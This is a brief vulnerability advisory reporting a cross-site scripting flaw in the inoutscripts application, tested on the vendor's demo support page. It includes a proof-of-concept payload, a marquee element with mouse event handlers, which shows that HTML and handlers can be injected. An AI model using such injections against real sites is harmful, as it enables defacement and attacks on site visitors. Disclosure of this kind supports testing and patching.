<------------------ header data start ------------------- >

#############################################################

# Application Name : inoutscripts

# Vulnerable Type : Cross-Site Scripting

# Bug Fix Advice : Harmful characters can be filtered out.

# Vendor Homepage : http://www.inoutscripts.com/

# Author : Cyber Warrior | CH2 Group | Pentester

# Author Contact : http://www.cyber-warrior.org/Forum/pop_up_profile.asp?profile=211591

# Tested on Demo Site : http://www.inoutscripts.com/support/index.php?page=
#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<marquee onmouseout="this.start();" onmouseover="this.stop();"> Bug Researchers </marquee>

< -- bug code end of -- >